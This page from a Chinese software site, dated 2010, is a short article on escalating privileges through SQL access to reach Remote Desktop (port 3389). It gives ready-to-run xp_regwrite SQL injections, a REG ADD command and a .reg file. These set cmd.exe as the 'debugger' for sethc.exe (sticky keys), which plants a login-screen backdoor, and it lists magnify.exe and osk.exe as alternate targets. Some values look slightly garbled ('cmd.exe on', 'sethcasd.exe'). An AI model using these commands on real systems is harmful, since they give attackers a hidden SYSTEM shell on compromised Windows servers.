您的位置: 飞扬精品软件园 >> 文章中心 >> 安全防线 >> 安全防护 >> 3389新思路 SQL渗透的一些技术整理

相关文章链接

本类文章排行

最新新闻资讯

    3389新思路 SQL渗透的一些技术整理

    3389新思路 SQL渗透的一些技术整理


    • 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22

    渗透的时候拿到了权限,如何通过SQL语句进行渗透提权,本文主要介绍了一些方法。目标:
    1、能修改注册表
    2、能访问3389


    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';--

    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /f


    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethcasd.exe]
    "debugger"="c:\\windows\\system32\\cmd.exe on"

    regedit

    /s             导入 .reg 文件进注册表(安静模式)

    /e             导出注册表文件

                 例:regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM

    magnify.exe

    osk.exe

    sethc.exe
     


查看所有评论

网友对3389新思路 SQL渗透的一些技术整理的评论

网名:
主题:
内容:
验证码: